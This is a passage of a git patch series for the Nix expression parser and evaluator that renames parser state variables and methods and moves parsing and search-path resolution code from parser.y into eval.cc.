expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1})); } + | expr_op '>' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1}); } + | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3})); } + | expr_op AND expr_op { $$ = new ExprOpAnd(state->makeCurPos(@2), $1, $3); } + | expr_op OR expr_op { $$ = new ExprOpOr(state->makeCurPos(@2), $1, $3); } + | expr_op IMPL expr_op { $$ = new ExprOpImpl(state->makeCurPos(@2), $1, $3); } + | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(state->makeCurPos(@2), $1, $3); } | expr_op '?' attrpath { $$ = new ExprOpHasAttr($1, std::move(*$3)); delete $3; } | expr_op '+' expr_op - { $$ = new ExprConcatStrings(data->makeCurPos(@2), false, new std::vector >({{data->makeCurPos(@1), $1}, {data->makeCurPos(@3), $3}})); } - | expr_op '-' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__sub")), {$1, $3}); } - | expr_op '*' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__mul")), {$1, $3}); } - | expr_op '/' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__div")), {$1, $3}); } - | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(data->makeCurPos(@2), $1, $3); } + { $$ = new ExprConcatStrings(state->makeCurPos(@2), false, new std::vector >({{state->makeCurPos(@1), $1}, {state->makeCurPos(@3), $3}})); } + | expr_op '-' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__sub")), {$1, $3}); } + | expr_op '*' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__mul")), {$1, $3}); } + | expr_op '/' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__div")), {$1, $3}); } + | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(state->makeCurPos(@2), $1, $3); } | expr_app ; @@ -466,7 +195,7 @@ expr_select | /* Backwards compatibility: because Nixpkgs has a rarely used function named ‘or’, allow stuff like ‘map or [...]’. */ expr_simple OR_KW - { $$ = new ExprCall(CUR_POS, $1, {new ExprVar(CUR_POS, data->symbols.create("or"))}); } + { $$ = new ExprCall(CUR_POS, $1, {new ExprVar(CUR_POS, state->symbols.create("or"))}); } | expr_simple ; @@ -476,25 +205,25 @@ expr_simple if ($1.l == s.size() && strncmp($1.p, s.data(), s.size()) == 0) $$ = new ExprPos(CUR_POS); else - $$ = new ExprVar(CUR_POS, data->symbols.create($1)); + $$ = new ExprVar(CUR_POS, state->symbols.create($1)); } | INT_LIT { $$ = new ExprInt($1); } | FLOAT_LIT { $$ = new ExprFloat($1); } | '"' string_parts '"' { $$ = $2; } | IND_STRING_OPEN ind_string_parts IND_STRING_CLOSE { - $$ = data->stripIndentation(CUR_POS, std::move(*$2)); + $$ = state->stripIndentation(CUR_POS, std::move(*$2)); delete $2; } | path_start PATH_END | path_start string_parts_interpolated PATH_END { - $2->insert($2->begin(), {data->makeCurPos(@1), $1}); + $2->insert($2->begin(), {state->makeCurPos(@1), $1}); $$ = new ExprConcatStrings(CUR_POS, false, $2); } | SPATH { std::string path($1.p + 1, $1.l - 2); $$ = new ExprCall(CUR_POS, - new ExprVar(data->symbols.create("__findFile")), - {new ExprVar(data->symbols.create("__nixPath")), + new ExprVar(state->symbols.create("__findFile")), + {new ExprVar(state->symbols.create("__nixPath")), new ExprString(std::move(path))}); } | URI { @@ -502,7 +231,7 @@ expr_simple if (noURLLiterals) throw ParseError({ .msg = hintfmt("URL literals are disabled"), - .errPos = data->state.positions[CUR_POS] + .errPos = state->state.positions[CUR_POS] }); $$ = new ExprString(std::string($1)); } @@ -510,7 +239,7 @@ expr_simple /* Let expressions `let {..., body = ...}' are just desugared into `(rec {..., body = ...}).body'. */ | LET '{' binds '}' - { $3->recursive = true; $$ = new ExprSelect(noPos, $3, data->symbols.create("body")); } + { $3->recursive = true; $$ = new ExprSelect(noPos, $3, state->symbols.create("body")); } | REC '{' binds '}' { $3->recursive = true; $$ = $3; } | '{' binds '}' @@ -526,23 +255,23 @@ string_parts string_parts_interpolated : string_parts_interpolated STR - { $$ = $1; $1->emplace_back(data->makeCurPos(@2), new ExprString(std::string($2))); } - | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $3); } - | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(data->makeCurPos(@1), $2); } + { $$ = $1; $1->emplace_back(state->makeCurPos(@2), new ExprString(std::string($2))); } + | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $3); } + | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(state->makeCurPos(@1), $2); } | STR DOLLAR_CURLY expr '}' { $$ = new std::vector>; - $$->emplace_back(data->makeCurPos(@1), new ExprString(std::string($1))); - $$->emplace_back(data->makeCurPos(@2), $3); + $$->emplace_back(state->makeCurPos(@1), new ExprString(std::string($1))); + $$->emplace_back(state->makeCurPos(@2), $3); } ; path_start : PATH { - Path path(absPath({$1.p, $1.l}, data->basePath.path.abs())); + Path path(absPath({$1.p, $1.l}, state->basePath.path.abs())); /* add back in the trailing '/' to the first segment */ if ($1.p[$1.l-1] == '/' && $1.l > 1) path += "/"; - $$ = new ExprPath(ref(data->state.rootFS), std::move(path)); + $$ = new ExprPath(ref(state->state.rootFS), std::move(path)); } | HPATH { if (evalSettings.pureEval) { @@ -552,24 +281,24 @@ path_start ); } Path path(getHome() + std::string($1.p + 1, $1.l - 1)); - $$ = new ExprPath(ref(data->state.rootFS), std::move(path)); + $$ = new ExprPath(ref(state->state.rootFS), std::move(path)); } ; ind_string_parts - : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $2); } - | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $3); } + : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $2); } + | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $3); } | { $$ = new std::vector>>; } ; binds - : binds attrpath '=' expr ';' { $$ = $1; data->addAttr($$, std::move(*$2), $4, data->makeCurPos(@2)); delete $2; } + : binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->makeCurPos(@2)); delete $2; } | binds INHERIT attrs ';' { $$ = $1; for (auto & i : *$3) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - data->dupAttr(i.symbol, data->makeCurPos(@3), $$->attrs[i.symbol].pos); - auto pos = data->makeCurPos(@3); + state->dupAttr(i.symbol, state->makeCurPos(@3), $$->attrs[i.symbol].pos); + auto pos = state->makeCurPos(@3); $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, true)); } delete $3; @@ -579,48 +308,48 @@ binds /* !!! Should ensure sharing of the expression in $4. */ for (auto & i : *$6) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - data->dupAttr(i.symbol, data->makeCurPos(@6), $$->attrs[i.symbol].pos); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), data->makeCurPos(@6))); + state->dupAttr(i.symbol, state->makeCurPos(@6), $$->attrs[i.symbol].pos); + $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), state->makeCurPos(@6))); } delete $6; } - | { $$ = new ExprAttrs(data->makeCurPos(@0)); } + | { $$ = new ExprAttrs(state->makeCurPos(@0)); } ; attrs - : attrs attr { $$ = $1; $1->push_back(AttrName(data->symbols.create($2))); } + : attrs attr { $$ = $1; $1->push_back(AttrName(state->symbols.create($2))); } | attrs string_attr { $$ = $1; ExprString * str = dynamic_cast($2); if (str) { - $$->push_back(AttrName(data->symbols.create(str->s))); + $$->push_back(AttrName(state->symbols.create(str->s))); delete str; } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = data->state.positions[data->makeCurPos(@2)] + .errPos = state->state.positions[state->makeCurPos(@2)] }); } | { $$ = new AttrPath; } ; attrpath - : attrpath '.' attr { $$ = $1; $1->push_back(AttrName(data->symbols.create($3))); } + : attrpath '.' attr { $$ = $1; $1->push_back(AttrName(state->symbols.create($3))); } | attrpath '.' string_attr { $$ = $1; ExprString * str = dynamic_cast($3); if (str) { - $$->push_back(AttrName(data->symbols.create(str->s))); + $$->push_back(AttrName(state->symbols.create(str->s))); delete str; } else $$->push_back(AttrName($3)); } - | attr { $$ = new std::vector; $$->push_back(AttrName(data->symbols.create($1))); } + | attr { $$ = new std::vector; $$->push_back(AttrName(state->symbols.create($1))); } | string_attr { $$ = new std::vector; ExprString *str = dynamic_cast($1); if (str) { - $$->push_back(AttrName(data->symbols.create(str->s))); + $$->push_back(AttrName(state->symbols.create(str->s))); delete str; } else $$->push_back(AttrName($1)); @@ -654,8 +383,8 @@ formals ; formal - : ID { $$ = new Formal{CUR_POS, data->symbols.create($1), 0}; } - | ID '?' expr { $$ = new Formal{CUR_POS, data->symbols.create($1), $3}; } + : ID { $$ = new Formal{CUR_POS, state->symbols.create($1), 0}; } + | ID '?' expr { $$ = new Formal{CUR_POS, state->symbols.create($1), $3}; } ; %% @@ -687,7 +416,7 @@ Expr * EvalState::parse( std::shared_ptr & staticEnv) { yyscan_t scanner; - ParseData data { + ParserState state { .state = *this, .symbols = symbols, .basePath = basePath, @@ -698,11 +427,11 @@ Expr * EvalState::parse( Finally _destroy([&] { yylex_destroy(scanner); }); yy_scan_buffer(text, length, scanner); - yyparse(scanner, &data); + yyparse(scanner, &state); - data.result->bindVars(*this, staticEnv); + state.result->bindVars(*this, staticEnv); - return data.result; + return state.result; } From 835a6c7bcfd0b22acc16f31de5fc7bb650d52017 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 266/654] rename ParserState::{makeCurPos -> at} most instances of this being used do not refer to the "current" position, sometimes not even to one reasonably close by. it could also be called `makePos` instead, but `at` seems clear in context. --- src/libexpr/lexer.l | 2 +- src/libexpr/parser-state.hh | 4 +-- src/libexpr/parser.y | 60 ++++++++++++++++++------------------- 3 files changed, 33 insertions(+), 33 deletions(-) diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index cfd61c90e..fae0e7a85 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -29,7 +29,7 @@ using namespace nix; namespace nix { -#define CUR_POS state->makeCurPos(*yylloc) +#define CUR_POS state->at(*yylloc) static void initLoc(YYLTYPE * loc) { diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index b33311743..167d3f4ae 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -49,7 +49,7 @@ struct ParserState { Formals * validateFormals(Formals * formals, PosIdx pos = noPos, Symbol arg = {}); Expr * stripIndentation(const PosIdx pos, std::vector>> && es); - PosIdx makeCurPos(const ParserLocation & loc); + PosIdx at(const ParserLocation & loc); }; inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) @@ -254,7 +254,7 @@ inline Expr * ParserState::stripIndentation(const PosIdx pos, return new ExprConcatStrings(pos, true, es2); } -inline PosIdx ParserState::makeCurPos(const ParserLocation & loc) +inline PosIdx ParserState::at(const ParserLocation & loc) { return state.positions.add(origin, loc.first_line, loc.first_column); } diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 7ce493df5..7763a72bc 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -45,14 +45,14 @@ YY_DECL; using namespace nix; -#define CUR_POS state->makeCurPos(*yylocp) +#define CUR_POS state->at(*yylocp) void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error) { throw ParseError({ .msg = hintfmt(error), - .errPos = state->state.positions[state->makeCurPos(*loc)] + .errPos = state->state.positions[state->at(*loc)] }); } @@ -158,21 +158,21 @@ expr_op | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(state->symbols.create("__sub")), {new ExprInt(0), $2}); } | expr_op EQ expr_op { $$ = new ExprOpEq($1, $3); } | expr_op NEQ expr_op { $$ = new ExprOpNEq($1, $3); } - | expr_op '<' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3}); } - | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1})); } - | expr_op '>' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1}); } - | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3})); } - | expr_op AND expr_op { $$ = new ExprOpAnd(state->makeCurPos(@2), $1, $3); } - | expr_op OR expr_op { $$ = new ExprOpOr(state->makeCurPos(@2), $1, $3); } - | expr_op IMPL expr_op { $$ = new ExprOpImpl(state->makeCurPos(@2), $1, $3); } - | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(state->makeCurPos(@2), $1, $3); } + | expr_op '<' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3}); } + | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1})); } + | expr_op '>' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1}); } + | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3})); } + | expr_op AND expr_op { $$ = new ExprOpAnd(state->at(@2), $1, $3); } + | expr_op OR expr_op { $$ = new ExprOpOr(state->at(@2), $1, $3); } + | expr_op IMPL expr_op { $$ = new ExprOpImpl(state->at(@2), $1, $3); } + | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(state->at(@2), $1, $3); } | expr_op '?' attrpath { $$ = new ExprOpHasAttr($1, std::move(*$3)); delete $3; } | expr_op '+' expr_op - { $$ = new ExprConcatStrings(state->makeCurPos(@2), false, new std::vector >({{state->makeCurPos(@1), $1}, {state->makeCurPos(@3), $3}})); } - | expr_op '-' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__sub")), {$1, $3}); } - | expr_op '*' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__mul")), {$1, $3}); } - | expr_op '/' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__div")), {$1, $3}); } - | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(state->makeCurPos(@2), $1, $3); } + { $$ = new ExprConcatStrings(state->at(@2), false, new std::vector >({{state->at(@1), $1}, {state->at(@3), $3}})); } + | expr_op '-' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__sub")), {$1, $3}); } + | expr_op '*' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__mul")), {$1, $3}); } + | expr_op '/' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__div")), {$1, $3}); } + | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(state->at(@2), $1, $3); } | expr_app ; @@ -216,7 +216,7 @@ expr_simple } | path_start PATH_END | path_start string_parts_interpolated PATH_END { - $2->insert($2->begin(), {state->makeCurPos(@1), $1}); + $2->insert($2->begin(), {state->at(@1), $1}); $$ = new ExprConcatStrings(CUR_POS, false, $2); } | SPATH { @@ -255,13 +255,13 @@ string_parts string_parts_interpolated : string_parts_interpolated STR - { $$ = $1; $1->emplace_back(state->makeCurPos(@2), new ExprString(std::string($2))); } - | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $3); } - | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(state->makeCurPos(@1), $2); } + { $$ = $1; $1->emplace_back(state->at(@2), new ExprString(std::string($2))); } + | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->at(@2), $3); } + | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(state->at(@1), $2); } | STR DOLLAR_CURLY expr '}' { $$ = new std::vector>; - $$->emplace_back(state->makeCurPos(@1), new ExprString(std::string($1))); - $$->emplace_back(state->makeCurPos(@2), $3); + $$->emplace_back(state->at(@1), new ExprString(std::string($1))); + $$->emplace_back(state->at(@2), $3); } ; @@ -286,19 +286,19 @@ path_start ; ind_string_parts - : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $2); } - | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $3); } + : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(state->at(@2), $2); } + | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->at(@2), $3); } | { $$ = new std::vector>>; } ; binds - : binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->makeCurPos(@2)); delete $2; } + : binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->at(@2)); delete $2; } | binds INHERIT attrs ';' { $$ = $1; for (auto & i : *$3) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - state->dupAttr(i.symbol, state->makeCurPos(@3), $$->attrs[i.symbol].pos); - auto pos = state->makeCurPos(@3); + state->dupAttr(i.symbol, state->at(@3), $$->attrs[i.symbol].pos); + auto pos = state->at(@3); $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, true)); } delete $3; @@ -308,12 +308,12 @@ binds /* !!! Should ensure sharing of the expression in $4. */ for (auto & i : *$6) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - state->dupAttr(i.symbol, state->makeCurPos(@6), $$->attrs[i.symbol].pos); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), state->makeCurPos(@6))); + state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos); + $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), state->at(@6))); } delete $6; } - | { $$ = new ExprAttrs(state->makeCurPos(@0)); } + | { $$ = new ExprAttrs(state->at(@0)); } ; attrs @@ -327,7 +327,7 @@ attrs } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = state->state.positions[state->makeCurPos(@2)] + .errPos = state->state.positions[state->at(@2)] }); } | { $$ = new AttrPath; } From e1aa585964c3d864ebff0030584f3349a539d615 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 267/654] slim down parser.y most EvalState and Expr members defined here could be elsewhere, where they'd be easier to maintain (not being embedded in a file with arcane syntax) and *somewhat* more faithfully placed according to the path of the file they're defined in. --- src/libexpr/eval.cc | 164 ++++++++++++++++++++++++++++++++++++++ src/libexpr/nixexpr.cc | 2 + src/libexpr/parser.y | 176 ----------------------------------------- 3 files changed, 166 insertions(+), 176 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 0659a2173..6eee7cdce 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -20,6 +20,8 @@ #include "gc-small-vector.hh" #include "url.hh" #include "fetch-to-store.hh" +#include "tarball.hh" +#include "flake/flakeref.hh" #include #include @@ -2636,6 +2638,168 @@ void EvalState::printStatistics() } +SourcePath resolveExprPath(SourcePath path) +{ + unsigned int followCount = 0, maxFollow = 1024; + + /* If `path' is a symlink, follow it. This is so that relative + path references work. */ + while (!path.path.isRoot()) { + // Basic cycle/depth limit to avoid infinite loops. + if (++followCount >= maxFollow) + throw Error("too many symbolic links encountered while traversing the path '%s'", path); + auto p = path.parent().resolveSymlinks() + path.baseName(); + if (p.lstat().type != InputAccessor::tSymlink) break; + path = {path.accessor, CanonPath(p.readLink(), path.path.parent().value_or(CanonPath::root))}; + } + + /* If `path' refers to a directory, append `/default.nix'. */ + if (path.resolveSymlinks().lstat().type == InputAccessor::tDirectory) + return path + "default.nix"; + + return path; +} + + +Expr * EvalState::parseExprFromFile(const SourcePath & path) +{ + return parseExprFromFile(path, staticBaseEnv); +} + + +Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr & staticEnv) +{ + auto buffer = path.resolveSymlinks().readFile(); + // readFile hopefully have left some extra space for terminators + buffer.append("\0\0", 2); + return parse(buffer.data(), buffer.size(), Pos::Origin(path), path.parent(), staticEnv); +} + + +Expr * EvalState::parseExprFromString(std::string s_, const SourcePath & basePath, std::shared_ptr & staticEnv) +{ + auto s = make_ref(std::move(s_)); + s->append("\0\0", 2); + return parse(s->data(), s->size(), Pos::String{.source = s}, basePath, staticEnv); +} + + +Expr * EvalState::parseExprFromString(std::string s, const SourcePath & basePath) +{ + return parseExprFromString(std::move(s), basePath, staticBaseEnv); +} + + +Expr * EvalState::parseStdin() +{ + //Activity act(*logger, lvlTalkative, "parsing standard input"); + auto buffer = drainFD(0); + // drainFD should have left some extra space for terminators + buffer.append("\0\0", 2); + auto s = make_ref(std::move(buffer)); + return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath(CanonPath::fromCwd()), staticBaseEnv); +} + + +SourcePath EvalState::findFile(const std::string_view path) +{ + return findFile(searchPath, path); +} + + +SourcePath EvalState::findFile(const SearchPath & searchPath, const std::string_view path, const PosIdx pos) +{ + for (auto & i : searchPath.elements) { + auto suffixOpt = i.prefix.suffixIfPotentialMatch(path); + + if (!suffixOpt) continue; + auto suffix = *suffixOpt; + + auto rOpt = resolveSearchPathPath(i.path); + if (!rOpt) continue; + auto r = *rOpt; + + Path res = suffix == "" ? r : concatStrings(r, "/", suffix); + if (pathExists(res)) return rootPath(CanonPath(canonPath(res))); + } + + if (hasPrefix(path, "nix/")) + return {corepkgsFS, CanonPath(path.substr(3))}; + + debugThrow(ThrownError({ + .msg = hintfmt(evalSettings.pureEval + ? "cannot look up '<%s>' in pure evaluation mode (use '--impure' to override)" + : "file '%s' was not found in the Nix search path (add it using $NIX_PATH or -I)", + path), + .errPos = positions[pos] + }), 0, 0); +} + + +std::optional EvalState::resolveSearchPathPath(const SearchPath::Path & value0, bool initAccessControl) +{ + auto & value = value0.s; + auto i = searchPathResolved.find(value); + if (i != searchPathResolved.end()) return i->second; + + std::optional res; + + if (EvalSettings::isPseudoUrl(value)) { + try { + auto storePath = fetchers::downloadTarball( + store, EvalSettings::resolvePseudoUrl(value), "source", false).storePath; + res = { store->toRealPath(storePath) }; + } catch (FileTransferError & e) { + logWarning({ + .msg = hintfmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value) + }); + } + } + + else if (hasPrefix(value, "flake:")) { + experimentalFeatureSettings.require(Xp::Flakes); + auto flakeRef = parseFlakeRef(value.substr(6), {}, true, false); + debug("fetching flake search path element '%s''", value); + auto storePath = flakeRef.resolve(store).fetchTree(store).first; + res = { store->toRealPath(storePath) }; + } + + else { + auto path = absPath(value); + + /* Allow access to paths in the search path. */ + if (initAccessControl) { + allowPath(path); + if (store->isInStore(path)) { + try { + StorePathSet closure; + store->computeFSClosure(store->toStorePath(path).first, closure); + for (auto & p : closure) + allowPath(p); + } catch (InvalidPath &) { } + } + } + + if (pathExists(path)) + res = { path }; + else { + logWarning({ + .msg = hintfmt("Nix search path entry '%1%' does not exist, ignoring", value) + }); + res = std::nullopt; + } + } + + if (res) + debug("resolved search path element '%s' to '%s'", value, *res); + else + debug("failed to resolve search path element '%s'", value); + + searchPathResolved.emplace(value, res); + return res; +} + + std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { throw TypeError({ diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 964de6351..6fe4ba81b 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -9,6 +9,8 @@ namespace nix { +unsigned long Expr::nrExprs = 0; + ExprBlackHole eBlackHole; // FIXME: remove, because *symbols* are abstract and do not have a single diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 7763a72bc..519d6b11f 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -389,25 +389,11 @@ formal %% - -#include -#include -#include -#include - #include "eval.hh" -#include "filetransfer.hh" -#include "tarball.hh" -#include "store-api.hh" -#include "flake/flake.hh" -#include "fs-input-accessor.hh" -#include "memory-input-accessor.hh" namespace nix { -unsigned long Expr::nrExprs = 0; - Expr * EvalState::parse( char * text, size_t length, @@ -435,166 +421,4 @@ Expr * EvalState::parse( } -SourcePath resolveExprPath(SourcePath path) -{ - unsigned int followCount = 0, maxFollow = 1024; - - /* If `path' is a symlink, follow it. This is so that relative - path references work. */ - while (!path.path.isRoot()) { - // Basic cycle/depth limit to avoid infinite loops. - if (++followCount >= maxFollow) - throw Error("too many symbolic links encountered while traversing the path '%s'", path); - auto p = path.parent().resolveSymlinks() + path.baseName(); - if (p.lstat().type != InputAccessor::tSymlink) break; - path = {path.accessor, CanonPath(p.readLink(), path.path.parent().value_or(CanonPath::root))}; - } - - /* If `path' refers to a directory, append `/default.nix'. */ - if (path.resolveSymlinks().lstat().type == InputAccessor::tDirectory) - return path + "default.nix"; - - return path; -} - - -Expr * EvalState::parseExprFromFile(const SourcePath & path) -{ - return parseExprFromFile(path, staticBaseEnv); -} - - -Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr & staticEnv) -{ - auto buffer = path.resolveSymlinks().readFile(); - // readFile hopefully have left some extra space for terminators - buffer.append("\0\0", 2); - return parse(buffer.data(), buffer.size(), Pos::Origin(path), path.parent(), staticEnv); -} - - -Expr * EvalState::parseExprFromString(std::string s_, const SourcePath & basePath, std::shared_ptr & staticEnv) -{ - auto s = make_ref(std::move(s_)); - s->append("\0\0", 2); - return parse(s->data(), s->size(), Pos::String{.source = s}, basePath, staticEnv); -} - - -Expr * EvalState::parseExprFromString(std::string s, const SourcePath & basePath) -{ - return parseExprFromString(std::move(s), basePath, staticBaseEnv); -} - - -Expr * EvalState::parseStdin() -{ - //Activity act(*logger, lvlTalkative, "parsing standard input"); - auto buffer = drainFD(0); - // drainFD should have left some extra space for terminators - buffer.append("\0\0", 2); - auto s = make_ref(std::move(buffer)); - return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath(CanonPath::fromCwd()), staticBaseEnv); -} - - -SourcePath EvalState::findFile(const std::string_view path) -{ - return findFile(searchPath, path); -} - - -SourcePath EvalState::findFile(const SearchPath & searchPath, const std::string_view path, const PosIdx pos) -{ - for (auto & i : searchPath.elements) { - auto suffixOpt = i.prefix.suffixIfPotentialMatch(path); - - if (!suffixOpt) continue; - auto suffix = *suffixOpt; - - auto rOpt = resolveSearchPathPath(i.path); - if (!rOpt) continue; - auto r = *rOpt; - - Path res = suffix == "" ? r : concatStrings(r, "/", suffix); - if (pathExists(res)) return rootPath(CanonPath(canonPath(res))); - } - - if (hasPrefix(path, "nix/")) - return {corepkgsFS, CanonPath(path.substr(3))}; - - debugThrow(ThrownError({ - .msg = hintfmt(evalSettings.pureEval - ? "cannot look up '<%s>' in pure evaluation mode (use '--impure' to override)" - : "file '%s' was not found in the Nix search path (add it using $NIX_PATH or -I)", - path), - .errPos = positions[pos] - }), 0, 0); -} - - -std::optional EvalState::resolveSearchPathPath(const SearchPath::Path & value0, bool initAccessControl) -{ - auto & value = value0.s; - auto i = searchPathResolved.find(value); - if (i != searchPathResolved.end()) return i->second; - - std::optional res; - - if (EvalSettings::isPseudoUrl(value)) { - try { - auto storePath = fetchers::downloadTarball( - store, EvalSettings::resolvePseudoUrl(value), "source", false).storePath; - res = { store->toRealPath(storePath) }; - } catch (FileTransferError & e) { - logWarning({ - .msg = hintfmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value) - }); - } - } - - else if (hasPrefix(value, "flake:")) { - experimentalFeatureSettings.require(Xp::Flakes); - auto flakeRef = parseFlakeRef(value.substr(6), {}, true, false); - debug("fetching flake search path element '%s''", value); - auto storePath = flakeRef.resolve(store).fetchTree(store).first; - res = { store->toRealPath(storePath) }; - } - - else { - auto path = absPath(value); - - /* Allow access to paths in the search path. */ - if (initAccessControl) { - allowPath(path); - if (store->isInStore(path)) { - try { - StorePathSet closure; - store->computeFSClosure(store->toStorePath(path).first, closure); - for (auto & p : closure) - allowPath(p); - } catch (InvalidPath &) { } - } - } - - if (pathExists(path)) - res = { path }; - else { - logWarning({ - .msg = hintfmt("Nix search path entry '%1%' does not exist, ignoring", value) - }); - res = std::nullopt; - } - } - - if (res) - debug("resolved search path element '%s' to '%s'", value, *res); - else - debug("failed to resolve search path element '%s'", value); - - searchPathResolved.emplace(value, res); - return res; -} - - } From b596cc9e7960b9256bcd557334d81e9d555be5a2 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 268/654] decouple parser and EvalState there's no reason the parser itself should be doing semantic analysis like 